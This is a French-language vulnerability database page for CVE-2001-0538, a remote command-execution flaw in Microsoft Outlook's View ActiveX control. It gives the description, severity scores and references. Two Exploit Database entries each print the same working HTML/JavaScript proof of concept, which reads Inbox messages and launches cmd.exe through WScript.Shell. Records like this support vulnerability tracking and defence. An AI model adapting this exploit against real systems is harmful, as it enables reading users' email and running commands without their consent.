CVE-2001-0538 : Détail

CVE-2001-0538

8.84%V3
Network
2002-03-09
04h00 +00:00
2002-02-26
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Microsoft Outlook View ActiveX Control in Microsoft Outlook 2002 and earlier allows remote attackers to execute arbitrary commands via a malicious HTML e-mail message or web page.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 21004

Date de publication : 2001-07-11 22h00 +00:00
Auteur : Georgi Guninski
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/3026/info Microsoft Outlook introduces a vulnerability that may allow attackers to execute arbitrary commands on a target system. The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts. Scripts can execute commands without user knowledge or consent. This assumes you have at least one message in Outlook XP's Inbox <br> <object id="o1" classid="clsid:0006F063-0000-0000-C000-000000000046" > <param name="folder" value="Inbox"> </object> <script> function f() { //alert(o2.object); sel=o1.object.selection; vv1=sel.Item(1); alert("Subject="+vv1.Subject); alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]"); alert("May be deleted"); //vv1.Delete(); vv2=vv1.Session.Application.CreateObject("WScript.Shell"); alert("Much more fun is possible"); vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ "); } setTimeout("f()",2000); </script>
Exploit Database EDB-ID : 21003

Date de publication : 2001-07-11 22h00 +00:00
Auteur : Georgi Guninski
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/3025/info Microsoft Outlook introduces a vulnerability that may allow attackers to access and manipulate user email. The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts. Scripts can access and perform operations on user email through this control without user knowledge or consent. This assumes you have at least one message in Outlook XP's Inbox <br> <object id="o1" classid="clsid:0006F063-0000-0000-C000-000000000046" > <param name="folder" value="Inbox"> </object> <script> function f() { //alert(o2.object); sel=o1.object.selection; vv1=sel.Item(1); alert("Subject="+vv1.Subject); alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]"); alert("May be deleted"); //vv1.Delete(); vv2=vv1.Session.Application.CreateObject("WScript.Shell"); alert("Much more fun is possible"); vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ "); } setTimeout("f()",2000); </script>

Products Mentioned

Configuraton 0

Microsoft>>Outlook >> Version To (including) 2002

Références

http://marc.info/?l=bugtraq&m=99496431214078&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/3025
Tags : vdb-entry, x_refsource_BID
http://www.ciac.org/ciac/bulletins/l-113.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.kb.cert.org/vuls/id/131569
Tags : third-party-advisory, x_refsource_CERT-VN